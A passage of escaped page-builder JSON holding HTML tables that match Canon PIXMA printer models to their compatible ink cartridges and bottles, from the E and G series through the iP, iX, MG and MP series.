(Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\",\"column_gap\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E4270<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E470<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E477<\\/td>\\n<td>CL-57S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E480<\\/td>\\n<td>CL-57 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-47 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E510<\\/td>\\n<td>CL-98 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-88 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr align=\\\"center\\\"><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>CL-831 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td>PG-830 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr>\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"170\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n      <td>CL-41 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-831 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-40\\/CL-41 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-830 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n      <td>CL-811 (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CL-811XL (Colour)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810 Twin Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810\\/CL-811 Value Pack<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PG-810XL (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td 